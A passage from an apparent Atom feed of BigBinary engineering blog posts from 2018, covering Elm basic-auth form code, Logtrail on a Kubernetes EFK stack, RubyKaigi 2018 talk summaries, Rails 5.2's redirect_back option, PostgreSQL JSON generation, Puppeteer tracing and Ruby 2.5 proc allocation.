extractedCreds of                            ( Nothing, Nothing ) -&gt;                                Nothing                            ( Just receivedUsername, Nothing ) -&gt;                                Just { username = receivedUsername, password = &quot;&quot; }                            ( Nothing, Just receivedPassword ) -&gt;                                Just { username = &quot;&quot;, password = receivedPassword }                            ( Just receivedUsername, Just receivedPassword ) -&gt;                                Just { username = receivedUsername, password = receivedPassword }                in                    { url = value.url                    , httpMethod = value.httpMethod                    , requestParameters = value.requestParameters                    , requestHeaders = value.requestHeaders                    , basicAuthentication = derivedBasicAuthentication                    , requestBody = value.requestBody                    }            Err err -&gt;                emptyRequest</code></pre><p>We extract the username and password into <em>extractedCreds</em> as a Pair from<em>ReceivedAPISnapshotRequest</em> after decoding and construct our<em>APISnapshotRequest</em> from it.</p><p>And now we have a clean view function which just takes a <em>BasicAuthentication</em>type and returns us a <em>Html Msg</em> type.</p><pre><code class="language-elm">view : BasicAuthentication -&gt; Html Msgview b =[ div [ class &quot;form-row&quot; ][ input[ type_ &quot;text&quot;, placeholder &quot;Username&quot;, value b.username, onInput (UpdateUsername)][], input[ type_ &quot;password&quot;, placeholder &quot;Password&quot;, value b.password, onInput (UpdatePassword)][], a[ href &quot;javascript:void(0)&quot;, onClick (RemoveBasicAuthentication)][ text &quot;&quot; ]]]</code></pre><p>We now have a Model that better captures the business logic. And should wechange the logic of basic authentication parameter selection in the future, Wedo not have to worry about updating the logic in the view .</p>]]></content>
    </entry><entry>
       <title><![CDATA[Logtrail to tail log with Elasticsearch & Kibana on Kubernetes]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/tail-log-using-logtrail-with-elk-on-kubernetes"/>
      <updated>2018-06-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tail-log-using-logtrail-with-elk-on-kubernetes</id>
      <content type="html"><![CDATA[<p>Monitoring and Logging are important aspects of deployments. Centralized loggingis always useful in helping us identify the problems.</p><p>EFK (Elasticsearch, Fluentd, Kibana) is a beautiful combination of tools tostore logs centrally and visualize them on a single click. There are many otheropen-source logging tools available in the market but EFK (ELK if Logstash isused) is one of the most widely used centralized logging tools.</p><p>This blog post shows how to integrate<a href="https://github.com/sivasamyk/logtrail">Logtrail</a> which has a<a href="https://papertrailapp.com/">papertrail</a> like UI to tail the logs. UsingLogtrail we can also apply filters to tail the logs centrally.</p><p>As EFK ships as an add-on with Kubernetes, all we have to do is deploy the EFKadd-on on our k8s cluster.</p><h4>Pre-requisite:</h4><ul><li><p>Access to working kubernetes cluster with<a href="https://kubernetes.io/docs/reference/kubectl/kubectl/">kubectl</a>configuration.</p></li><li><p>All our application logs should be redirected to STDOUT, so that Fluentdforwards them to Elasticsearch.</p></li><li><p>Understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>,<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>,<a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>,<a href="https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/">daemonsets</a>,<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a>and<a href="https://kubernetes.io/docs/concepts/cluster-administration/addons/">addons</a>.</p></li></ul><p>Installing EFK add-on from<a href="https://github.com/kubernetes/kops/tree/master/addons/logging-elasticsearch">kubernetes upstream</a>is simple. Deploy EFK using following command.</p><pre><code class="language-bash">$ kubectl create -f https://raw.githubusercontent.com/kubernetes/kops/master/addons/logging-elasticsearch/v1.6.0.yamlserviceaccount &quot;elasticsearch-logging&quot; createdclusterrole &quot;elasticsearch-logging&quot; createdclusterrolebinding &quot;elasticsearch-logging&quot; createdserviceaccount &quot;fluentd-es&quot; createdclusterrole &quot;fluentd-es&quot; createdclusterrolebinding &quot;fluentd-es&quot; createddaemonset &quot;fluentd-es&quot; createdservice &quot;elasticsearch-logging&quot; createdstatefulset &quot;elasticsearch-logging&quot; createddeployment &quot;kibana-logging&quot; createdservice &quot;kibana-logging&quot; created</code></pre><p>Once k8s resources are created access the Kibana dashboard. To access thedashboard get the URL using <code>kubectl cluster-info</code></p><pre><code class="language-bash">$ kubectl cluster-info | grep KibanaKibana is running at https://api.k8s-test.com/api/v1/proxy/namespaces/kube-system/services/kibana-logging</code></pre><p>Now goto Kibana dashboard and we should be able to see the logs on ourdashboard.</p><p><img src="/blog_images/2018/tail-log-using-logtrail-with-elk-on-kubernetes/kibana_dashboard.png" alt="Kibana dashboard"></p><p>Above dashboard shows the Kibana UI. We can create metrics and graphs as per ourrequirement.</p><p>We also want to view logs in <code>tail</code> style. We will use<a href="https://github.com/sivasamyk/logtrail">logtrail</a> to view logs in tail format.For that, we need docker image having logtrail plugin pre-installed.</p><p><strong>Note:</strong> If upstream Kibana version of k8s EFK add-on is 4.x, use kibana 4.ximage for installing logtrail plugin in your custom image. If add-on ships withkibana version 5.x, make sure you pre-install logtrail on kibana 5 image.</p><p>Check the kibana version for add-on<a href="https://github.com/kubernetes/kops/blob/master/addons/logging-elasticsearch/v1.6.0.yaml#L245">here</a>.</p><p>We will replace default kibana image with<a href="https://hub.docker.com/r/rahulmahale/kubernetes-logtrail/">kubernetes-logtrail image</a>.</p><p>To replace docker image update the kibana deployment using below command.</p><pre><code class="language-bash">$ kubectl -n kube-system set image deployment/kibana-logging kibana-logging=rahulmahale/kubernetes-logtrail:latestdeployment &quot;kibana-logging&quot; image updated</code></pre><p>Once the image is deployed go to the kibana dashboard and click on logtrail asshown below.</p><p><img src="/blog_images/2018/tail-log-using-logtrail-with-elk-on-kubernetes/kibana-logtrail-menu.png" alt="Switch to logtrail"></p><p>After switching to logtrail we will start seeing all the logs in real time asshown below.</p><p><img src="/blog_images/2018/tail-log-using-logtrail-with-elk-on-kubernetes/logtrail.png" alt="Logs in Logtrail"></p><p>This centralized logging dashboard with logtrail allows us to filter on severalparameters.</p><p>For example let's say we want to check all the logs for namespace <code>myapp</code>. Wecan use filter <code>kubernetes.namespace_name:&quot;myapp&quot;</code>. We can user filter<code>kubernetes.container_name:&quot;mycontainer&quot;</code> to monitor log for a specificcontainer.</p>]]></content>
    </entry><entry>
       <title><![CDATA[RubyKaigi 2018 Day two]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rubykaigi-2018-day-two"/>
      <updated>2018-06-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rubykaigi-2018-day-two</id>
      <content type="html"><![CDATA[<p><a href="http://rubykaigi.org/2018">RubyKaigi</a> is happening at Sendai, Japan from 31stMay to 2nd June. It is perhaps the only conference where one can find almost allthe core Ruby team members in attendance.</p><p>This is <a href="https://twitter.com/_cha1tanya">Prathamesh</a>. I bring you live detailsabout what is happening at the Kaigi over the next two days. If you are at theconference please come and say &quot;Hi&quot; to me.</p><p>Check out<a href="https://blog.bigbinary.com/2018/05/31/rubykaigi-2018-day-one.html">what happened on day 1</a>.</p><h3>Faster Apps, No Memory Thrash: Get Your Memory Config Right by Noah Gibbs</h3><p><a href="https://twitter.com/codefolio">Noah</a> gave an awesome talk on techniques tomanage the memory used by Ruby applications. One of the main point while dealingwith GC is to make it run less, which means don't create too many objects. Healso mentioned that if application permits then destructive operations such as<code>gsub!</code> or <code>concat</code> should be used since they save CPU cycles and memory. Rubyallows setting up environment variables for managing the heap memory but it isreally hard to choose values for these environment variables blindly.</p><p>Noah has built a tool which uses <code>GC.stat</code> results from applications to estimatethe values of the memory related environment variables. Check out the<a href="https://github.com/noahgibbs/env_mem">EnvMem</a> gem.</p><p>In the end, he discussed some advanced debugging methods like checkingfragmentation percentage. The formula is prepared by<a href="https://twitter.com/nateberkopec/">Nate Berkopec</a>.</p><pre><code class="language-ruby">s = GC.statused_ratio = s[:heap_live_slots].to_f / (s[:heap_eden_pages] * 408)fragmentation = 1 - used_ratio</code></pre><p>We can also use <code>GC::Profiler</code> to profile the code in real time to see how GC isbehaving.</p><p>Benchmark used for this talk can be found<a href="https://github.com/noahgibbs/rails_ruby_bench">here</a>. Slides for this talk canbe found<a href="https://docs.google.com/presentation/d/1-WrYwz-QnSI9yeRZfCCgUno-KOMuggiGHlmOETXZy9c/edit?usp=sharing">here</a>.</p><h3>Guild prototype</h3><p>Next I attended talk by <a href="https://twitter.com/_ko1">Koichi Sasada</a> on Guildprototype. He discussed the proposed design spec for Guild with a demo ofFibonacci number program with 40 core CPU and 40 guilds. One of the interestingobservations is that performance drops as number of guilds increases because ofthe global locking.</p><p><img src="/blog_images/2018/rubykaigi-2018-day-two/guild.JPG" alt="Guild performance"></p><p>He discussed the concept of shareable and non-shareable objects. Shareableobjects can be shared across multiple Guilds whereas non-shareable objects canonly be used one Guild. This also means, you can't make thread unsafe programwith Guilds &quot;by design&quot;. He discussed about the challenges in specifying theshareable objects for Guilds.</p><p>Overall, there is still a lot of work left to be done for Guilds to become apart of Ruby. It includes defining protocols for shareable and non-shareableobjects, making sure GC runs properly in case of Guilds, synchronization betweendifferent Guilds.</p><p>The slides for this talk can be found<a href="http://www.atdot.net/~ko1/activities/2018_rubykaigi2018.pdf">here</a>.</p><h3>Ruby programming with type checking</h3><p><a href="https://twitter.com/soutaro">Soutaro</a> from SideCI gave a talk on<a href="https://github.com/soutaro/steep">Steep</a>, a gradual type checker for Ruby.</p><p>In the past, Matz has said that he doesn't like type definitions to be presentin the Ruby code. Steep requires type definitions to be present in separatefiles with extension <code>.rbi</code>. The Ruby source code needs little amount ofannotations. Steep also has a scaffold generator to generate the basic typedefinitions for existing code.</p><p><img src="/blog_images/2018/rubykaigi-2018-day-two/steep.JPG" alt="Steep v/s Sorbet"></p><p>As of now, Steep runs slower than <a href="https://sorbet.run">Sorbet</a> which wasdiscussed yesterday by Stripe team. Soutaro also discussed issues in typedefinitions due to meta programming in libraries such as Active Record. Thatlooks like a challenge for Steep as of now.</p><h3>Web console</h3><p>After the tea break, I attended talk by Genadi on how<a href="https://github.com/rails/web-console">web console</a> works.</p><p>He discussed the implementation of web-console in detail with references to Rubyinternals related to bindings. He compared the web-console interface with IRBand pry and explained the difference. As of now, web console has to monkey patchsome of the Rails internals. Genadi has added support for<a href="https://github.com/rails/rails/pull/23868">registering interceptors</a> which willprevent this monkey patching in Rails 6. He is also mentoring a Google summer ofcode student to work on Actionable errors project where the user can takeactions like running pending migrations via the webpage itself when the error isshown.</p><h3>Ruby committers v/s the World</h3><p><img src="/blog_images/2018/rubykaigi-2018-day-two/committers.JPG" alt="Ruby Committers v/s the World"></p><p>RubyKaigi offers this unique event where all the Ruby committers come on stageand face the questions from the audience. This year the format was slightlydifferent and it was run in the style of the Ruby core developer meeting. The<a href="https://docs.google.com/document/u/1/d/1Skh54Fq_nkpycZAS4_03tsafrtABDWxIx2-CKc-QIOY/pub">agenda</a>was predecided with some questions from the people and some tickets to discuss.The session started with discussion of<a href="https://www.ruby-lang.org/en/news/2018/05/31/ruby-2-6-0-preview2-released/">features coming up in Ruby 2.6</a>.</p><p>After that, the questions and the tickets in the agenda were discussed. It wasgood to see how the Ruby team takes decisions about features and suggestions.</p><p>Apart from this, there were<a href="http://rubykaigi.org/2018/schedule#jun01">talks on SciRuby, mRuby, linting, gem upgrades, c extensions and more</a>which I could not attend.</p><p>That's all for the day two. Looking forward to the day three already!</p><p>Oh and here is the world map of all the attendees from RubyKaigi.</p><p><img src="/blog_images/2018/rubykaigi-2018-day-two/world.JPG" alt="World map of all attendees"></p>]]></content>
    </entry><entry>
       <title><![CDATA[RubyKaigi 2018 Day one]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rubykaigi-2018-day-one"/>
      <updated>2018-05-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rubykaigi-2018-day-one</id>
      <content type="html"><![CDATA[<p><a href="http://rubykaigi.org/2018">RubyKaigi</a> is happening at Sendai, Japan from 31st May to2nd June. It is perhaps the only conference where one can find almost allthe core Ruby team members in attendance.</p><p>This is <a href="https://twitter.com/_cha1tanya">Prathamesh</a>.I bring you live details about what is happeningat the Kaigi over the next three days.If you are at the conference please come and say &quot;Hi&quot; to me.</p><h3>Matz's keynote</h3><p>RubyKaigi started with Matz's keynote. He used lot of proverbs applyingthem to the Ruby language and software development.</p><p>He talked about one of the hardest problems in programming - naming with an example of<code>yield_self</code>.Matz added alias <code>then</code> to the <code>yield_self</code> method <a href="https://github.com/ruby/ruby/commit/d53ee008911b5c3b22cff1566a9ef7e7d4cbe183">yesterday</a>. He also discussed about <code>googlability</code> of the names.Ironically, Ruby was named in 1993 which was before Google had started.</p><p>Matz also touched upon<a href="https://www.ruby-lang.org/en/news/2018/02/24/ruby-2-6-0-preview1-released/">JIT option being introduced in Ruby 2.6</a>and guild as the ways the language continues to improve inperformance and concurrency.There is a talk on Guild by Koichi Sasada on second day of RubyKaigi whichwill have further details about it.</p><p>Matz ended the keynote talking about the need of maintaining backward compatibilityand not running into the situation like Ruby 1.9 or Python 3 where the compatibility was notmaintained. He also stressed upon the community aspect of the Ruby language and its importancein the success of Ruby.</p><h3>ETL processing in Ruby using Kiba</h3><p><a href="https://twitter.com/thibaut_barrere">Thibaut Barrre</a>gave a talk on<a href="https://www.kiba-etl.org">Kiba</a> - a data processing ETL framework for Ruby.He discussed aboutthe design decisions that went into the version 1 and how it evolved to version 2 which was recently released.</p><p>Kiba provides programmatic API which can be used in the background jobs instead of shelling out. It alsohas support for multistep batch processing.</p><p>Thibaut also explained how it can be used for data migration,reusing the components and big rewrites. He observed that the performance has been gradually increasing with each Ruby release over the years.</p><p>The slides for this talk can be found <a href="https://speakerdeck.com/thbar/kiba-etl-v2-rubykaigi-2018">here</a>.</p><h3>Architecture of Hanami applications</h3><p>Next I attended talk from<a href="https://twitter.com/anton_davydov">Anton Davydov</a>on architecture patterns in Hanami apps.He discussed about the problems typical Rails applications faceandhow abstractions can address those issues.He explained how Hanami tries to achieve business logic isolation, avoid global state, sequential logic and test coverage.Functional callable objects, containers, dry-containers, dry-inject and event sourcing are some of the abstractions that can be used in Hanami apps that help inachieving this.</p><h3>Lightning talks</h3><p>The last session of the day was lightning talks.</p><p>The talk on<a href="https://github.com/godfat/rib">Rib</a>(wordplay on IRB) was an interesting one. Rib is yet another interactive Ruby shell but lightweight compared to IRB and pry. It has some nice features like auto indent, multiline history, filtering of callers. It can also <code>beep</code> when the console starts, so you know it is time to get back to work.</p><p>I liked another talk where<a href="https://github.com/Watson1978">Watson</a>had worked on improving the performance of JSON gem.He achieved this by using CRuby API wherever applicable and avoiding heavy calls like <code>rbfuncall</code>.Check these two<a href="https://github.com/flori/json/pull/346/">pull</a><a href="https://github.com/flori/json/pull/345">requests</a> for benchmark and more discussions.</p><p>Apart from these talks,there were lot of other talks as well which I could not attend.<a href="http://rubykaigi.org/2018/presentations/DarkDimius.html#may31">Stripe team</a>is building a<a href="https://sorbet.run">type checker for Ruby</a>which looks very interesting and is extremely fast.</p><p><a href="http://rubykaigi.org/2018/presentations/bbatsov.html#may31">Bozhidar Batsov</a>gave a talk on Rubocop project andhow it has evolved over the years.There was also a talk on Karafka - event driven architecture in Ruby.This talk was a good precursor to the Hanami talk where event driven architecture was mentioned again.</p><p><a href="http://rubykaigi.org/2018/schedule#may31">Other talks from day one</a>ranged from memory management, playing with Ruby syntax, code highlighter, deep learning, C extensions to Rubygems.</p><p>That's all for the day one. Looking forward to the day two already!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 adds allow_other_host to redirect_back method]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-allow_other_host-option-to-redirect_back-method"/>
      <updated>2018-05-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-allow_other_host-option-to-redirect_back-method</id>
      <content type="html"><![CDATA[<p>Rails 5.0 had introduced<a href="https://blog.bigbinary.com/2016/02/29/rails-5-improves-redirect_to_back-with-redirect-back.html">redirect_back</a>method to perform redirection to path present in <code>HTTP_REFERRER</code>. If there is no<code>HTTP_REFERRER</code> present, then site is redirected to <code>fallback_location</code>.</p><p>Now consider the following scenario.</p><p>In one of the searches on <code>google.com</code>, we see a link to <code>bigbinary.com</code>. Onclicking the link, we are navigated to <code>bigbinary.com</code>.</p><p>When somebody gets redirected to <code>bigbinary.com</code> from <code>google.com</code>, the HTTPREFERRER is set to <code>google.com</code></p><p>If <code>bigbinary.com</code> uses <code>redirect_back</code> in its code then the user will getredirected to <code>google.com</code> which might be undesired behavior for someapplications.</p><p>To avoid such cases, Rails 5.2 has added a flag<a href="https://github.com/rails/rails/pull/30850/commits/0db6a14ae16b143e078375ff7f3c940cf707290b">allow_other_host</a>to not allow redirecting to a different host other than the current site.</p><p>By default, <code>allow_other_host</code> option is set to <code>true</code>. So if you do not wantusers to go back to <code>google.com</code> then you need to explicitly set<code>allow_other_host: false</code>.</p><pre><code class="language-ruby">&gt; request.host#=&gt; &quot;http://www.bigbinary.com&quot;&gt; request.headers[&quot;Referrer&quot;]#=&gt; &quot;http://www.google.com&quot;# This will redirect back to google.comredirect_back(fallback_path: &quot;/&quot;)# This will not redirect back to google.comredirect_back(fallback_path: &quot;/&quot;, allow_other_host: false)</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Faster JSON generation using PostgreSQL JSON function]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/generating-json-using-postgresql-json-function"/>
      <updated>2018-05-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/generating-json-using-postgresql-json-function</id>
      <content type="html"><![CDATA[<p>There are various ways to generate JSON in Rails. There is<a href="http://api.rubyonrails.org/classes/ActiveStorage/Filename.html#method-i-to_json">to_json</a>method built in Rails. We can also use<a href="https://github.com/rails/jbuilder">jbuilder gem</a> or<a href="https://github.com/rails-api/active_model_serializers">active model serializer gem</a>which can help us achieve the same.</p><p>As the number of records in the database grow, Rails can take a very long timeto generate a response. The bottleneck can generally be traced back to JSONgeneration.</p><p>Recently, in one of our applications, we faced this issue where a page wastaking too long to load. The load time was critical for us as this was the mostvisited page on the site. The page was loading a race, its racers and their lapdetails.</p><p>The page was loading fine for short races, with 10-15 racers and each racerhaving 30-50 laps. But for endurance races, with around 50-80 racers and eachracer having around 700-800 laps, we were hitting the bottleneck with loadtimes.</p><p>After benchmarking, JSON generation at the backend was found to be the culprit.</p><p>Looking out for solutions to fix the problem, we came across<a href="https://www.postgresql.org/docs/9.2/static/functions-json.html">PostgreSQL JSON functions</a>.</p><p><strong>PostgreSQL 9.2</strong> and above have built in support for generating JSON usingfunctions <code>row_to_json</code> and <code>array_to_json</code>. Let's look into both of them indetail.</p><h2>row_to_json</h2><p><code>row_to_json</code> returns each of the rows as JSON object.</p><pre><code class="language-pgsql">select row_to_json(laps) from laps;{&quot;id&quot;:1, &quot;number&quot;:1, &quot;position&quot;:4, &quot;time&quot;:&quot;628.744&quot;, &quot;flag_type&quot;:&quot;Green&quot;}...</code></pre><p>We could use a subquery to only fetch the attributes/columns which we require.</p><pre><code class="language-pgsql">select row_to_json(lap)from (  select id, number, position, time, flag_type from laps) lap;{&quot;id&quot;:1,&quot;number&quot;:1,&quot;position&quot;:4,&quot;time&quot;:&quot;628.744&quot;,&quot;flag_type&quot;:&quot;Green&quot;}{&quot;id&quot;:2,&quot;number&quot;:2,&quot;position&quot;:4,&quot;time&quot;:&quot;614.424&quot;,&quot;flag_type&quot;:&quot;Green&quot;}...</code></pre><h2>array_to_json</h2><p>To understand <code>array_to_json</code> function, we must first look into <code>array_agg</code>.<code>array_agg</code> is an aggregate function. Aggregate functions compute a singleresult from a set of input values. <code>sum</code>, <code>min</code>, <code>max</code> are some other examplesof aggregate functions. <code>array_agg</code> concatenates all the input values into aPostgreSQL array.</p><pre><code class="language-pgsql">select array_agg(lap)from (  select id, number, position, time, flag_type from laps) lap;{&quot;(1,1,4,\&quot;628.744\&quot;,\&quot;Green\&quot;)&quot;,&quot;(2,2,4,\&quot;614.424\&quot;,\&quot;Green\&quot;)&quot;, ... }</code></pre><p>To convert this PostgreSQL array into JSON, we can use the <code>array_to_json</code>function.</p><pre><code class="language-pgsql">select array_to_json(array_agg(lap))from (  select id, number, position, time, flag_type from laps) lap;[{&quot;id&quot;:1,  &quot;number&quot;:1,  &quot;position&quot;:4,  &quot;time&quot;:&quot;628.744&quot;,  &quot;flag_type&quot;:&quot;Green&quot;},  ...]</code></pre><h2>A more complex example</h2><p>We can use the above two functions together to generate custom JSON response.</p><pre><code class="language-pgsql">select row_to_json(u)from (  select first_name, last_name,    (      select array_to_json(array_agg(b))      from (        select number, position, time, flag_type        from laps        inner join racer_laps        on laps.id = racer_laps.lap_id        where racer_laps.racer_id = racers.id      ) b    ) as laps  from racers  where first_name = 'Jack') u;{  &quot;first_name&quot;: &quot;Jack&quot;,  &quot;last_name&quot;: &quot;Altenwerth&quot;,  &quot;laps&quot;: [    {      &quot;number&quot;: 1,      &quot;position&quot;: 4,      &quot;time&quot;: &quot;628.744&quot;,      &quot;flag_type&quot;: &quot;Green&quot;    },    {      &quot;number&quot;: 2,      &quot;position&quot;: 4,      &quot;time&quot;: &quot;614.424&quot;,      &quot;flag_type&quot;: &quot;Green&quot;    },    ...  ]}</code></pre><h2>Using the functions in Rails</h2><p>We can use the above mentioned functions in Rails as shown here.</p><pre><code class="language-pgsql">query = &lt;&lt;~EOQselect row_to_json(u)from (  select first_name, last_name,    (      select array_to_json(array_agg(b))      from (        select number, position, time, flag_type        from laps        inner join racer_laps        on laps.id = racer_laps.lap_id        where racer_laps.racer_id = racers.id      ) b    ) as laps  from racers  where first_name = 'Jack') u;EOQgenerated_json = ActiveRecord::Base.connection.execute(query).values;puts generated_json{  &quot;first_name&quot;: &quot;Jack&quot;,  &quot;last_name&quot;: &quot;Altenwerth&quot;,  &quot;laps&quot;: [    {      &quot;number&quot;: 1,      &quot;position&quot;: 4,      &quot;time&quot;: &quot;628.744&quot;,      &quot;flag_type&quot;: &quot;Green&quot;    },    {      &quot;number&quot;: 2,      &quot;position&quot;: 4,      &quot;time&quot;: &quot;614.424&quot;,      &quot;flag_type&quot;: &quot;Green&quot;    },    ...  ]}</code></pre><p>Although the code to generate the JSON using the above way is more verbose andless readable compared to other ways to generate JSON in Rails, it is moreperformant.</p><h2>Observations</h2><p>On the racer's page, generating the JSON using the PostgreSQL functions, gave usthe following improvements.</p><p>For short races (10-15 racers and each racer having 30-50 laps), the average APIresponse time decreased from <code>40ms</code> to <code>15ms</code>.</p><p>For endurance races (50-80 racers and each racer having around 700-800 laps),the average API response time decreased from <code>1200ms</code> to <code>20ms</code>.</p><h2>Conclusion</h2><p>Use Rails way of generating JSON as long as you can. If performance starts to bean issue then don't be afraid of using the features made available by thedatabase. In this case we would be trading performance for complexity in code.However sometimes this trade is worth it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[APISnapshot built on Elm & Rails is open source]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/apisnapshot-built-using-elm-and-ruby-on-rails-is-open-source"/>
      <updated>2018-05-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/apisnapshot-built-using-elm-and-ruby-on-rails-is-open-source</id>
      <content type="html"><![CDATA[<p>APISnapshot (Link not available) is built using Elm and Ruby on Rails. Todaywere happy to announce that the code is publicly<a href="https://github.com/bigbinary/apisnapshot">available on GitHub</a>.</p><p>We built APISnapshot for two reasons.</p><p>We wanted to work with <a href="http://elm-lang.org">Elm</a>.</p><p>We wanted to have a tool that is easy to use and that will help us capture whatresponse we are getting from the API in a format that is easy to share in githubissue, in slack or in an email. As a consulting company we work with variousteams around the world and during development phase either API is unstable orthey do not do what they should be doing.</p><p>We originally built this tool using <a href="https://reactjs.org">React</a>. Elm compileris quite strict and forced us to take into consideration all possibilities. Thislead us to notice a few bugs which were still present in React code. In this wayElm compiler helped us produce &quot;correct&quot; software by eliminating some of thebugs that we would have found later.</p><p>JSON encoding/decoding is a hard problem in Elm in general. In most of the caseswe know the shape of the API response we are going to get.</p><p>In the case of APISnapshot we do not know the shape of the JSON response we willget. Because of that it took us a bit longer to build the application. However,this forced us to really dig deep into JSON encoding/decoding issue in Elm andwe learned a lot.</p><p>We would like to thank all the<a href="https://github.com/bigbinary/apisnapshot/graphs/contributors">contributors</a> tothe project. Special shout out goes to <a href="https://github.com/jasim">Jasim</a> for thediscussion and the initial work on parsing the JSON file.</p><p>We like the combination of Elm and Ruby on Rails so much so that we are building<a href="https://www.acehelp.com">AceHelp</a> using the same technologies. AceHelp is<a href="https://github.com/bigbinary/acehelp">open source</a> from day one.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Generating filmstrip using puppeteer for better debugging]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/generating-filmstrip-using-puppeteer-for-better-debugging"/>
      <updated>2018-05-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/generating-filmstrip-using-puppeteer-for-better-debugging</id>
      <content type="html"><![CDATA[<p>We are writing a lot of automation tests using<a href="https://github.com/GoogleChrome/puppeteer">Puppeteer</a>.</p><p>Since puppeteer scripts execute so fast certain tests fail when they should bepassing. Debugging those tests can be a challenge.</p><p>Chrome devtools comes with<a href="https://www.youtube.com/watch?v=r1LVAu1BB8Y">filmstrip feature</a>. In&quot;Performance&quot; tab we can see screenshots of the site as they change over time.</p><p>We wanted puppeteer to generate similar filmstrip so that we can visuallyidentify the source of the problem.</p><p>It turns out that puppeteer makes it very easy. Here is the full code.</p><pre><code class="language-javascript">import puppeteer from &quot;puppeteer&quot;;(async () =&gt; {  const browser = await puppeteer.launch({ headless: false });  const page = await browser.newPage();  await page.setViewport({ width: 1280, height: 1024 });  await page.tracing.start({ path: &quot;trace.json&quot;, screenshots: true });  await page.goto(&quot;https://www.bigbinary.com&quot;);  await Promise.all([    page.waitForNavigation(),    page.click(&quot;#navbar &gt; ul &gt; li:nth-child(1) &gt; a&quot;),  ]);  await page.tracing.stop();  await browser.close();})();</code></pre><p>If we execute this script then it will generate a file called <code>trace.json</code>. Thisfile has images embedded in it which are base64 encoded.</p><p>To see the filmstrip drag the <code>trace.json</code> file to &quot;Performance&quot; tab in theChrome devtool. Here is a quick video explaining this.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/hZGTIyc3Xak&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 added lazy proc allocation for block parameters]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-added-lazy-proc-allocation-for-block-parameters"/>
      <updated>2018-05-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-added-lazy-proc-allocation-for-block-parameters</id>
      <content type="html"><![CDATA[<pre><code class="language-ruby">irb&gt; def greetirb&gt;   yieldirb&gt; end  =&gt; :greetirb&gt;irb&gt; def greet_with_welcome(&amp;block)irb&gt;   puts 'Welcome'irb&gt;   greet(&amp;block)irb&gt; end  =&gt; :greet_with_welcomeirb&gt; greet_with_welcome { p 'BigBinary' }Welcome&quot;BigBinary&quot;  =&gt; &quot;BigBinary&quot;</code></pre><p>In Ruby 2.4 when we pass a block to a method, which further passes to anothermethod, Ruby creates a new <code>Proc</code> object by the given block before passing thisproc to the another method.</p><p>This creates unnecessary objects even when the block parameter is not accessed.It also creates a chain of <code>Proc</code> objects when the block parameter is passedthrough various methods.</p><p>Proc creation is one a heavyweight operation because we need to store all localvariables (represented by Env objects in MRI internal) in the heap.</p><p>Ruby 2.5 introduced a lazy proc allocation. Ruby 2.5 will not create a Procobject when passing a block to another method. Instead, it will pass the blockinformation. If the block is accessed somewhere else, then it creates a <code>Proc</code>object by the given block.</p><p>This results in lesser memory allocation and faster execution.</p><h4>Ruby 2.4</h4><pre><code class="language-ruby">irb&gt; require 'benchmark'  =&gt; trueirb&gt; def greetirb&gt;   yieldirb&gt; end  =&gt; :greetirb&gt;irb&gt; def greet_with_welcome(&amp;block)irb&gt;   puts 'Welcome'irb&gt;   greet(&amp;block)irb&gt; end  =&gt; :greet_with_welcomeirb&gt;irb&gt; Benchmark.measure { 1000.times { greet_with_welcome { 'BigBinary' } } }WelcomeWelcome.........  =&gt; #&lt;Benchmark::Tms:0x007fe6ab929de0 @label=&quot;&quot;, @real=0.022295999999187188, @cstime=0.0, @cutime=0.0, @stime=0.01, @utime=0.0, @total=0.01&gt;</code></pre><h4>Ruby 2.5</h4><pre><code class="language-ruby">irb&gt; require 'benchmark'  =&gt; trueirb&gt; def greetirb&gt;   yieldirb&gt; end  =&gt; :greetirb&gt;irb&gt; def greet_with_welcome(&amp;block)irb&gt;   puts 'Welcome'irb&gt;   greet(&amp;block)irb&gt; end  =&gt; :greet_with_welcomeirb&gt;  irb&gt; Benchmark.measure { 1000.times { greet_with_welcome { 'BigBinary' } } }WelcomeWelcome.........  =&gt; #&lt;Benchmark::Tms:0x00007fa4400871b8 @label=&quot;&quot;, @real=0.004612999997334555, @cstime=0.0, @cutime=0.0, @stime=0.001524000000000001, @utime=0.0030690000000000023, @total=0.004593000000000003&gt;</code></pre><p>As we can see, there is considerable improvement in execution time when a blockparam is passed in Ruby 2.5.</p><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/5ee9513a71">commit</a>and <a href="https://bugs.ruby-lang.org/issues/14045">discussion</a>.</p>]]></content>
    </entry><entry>
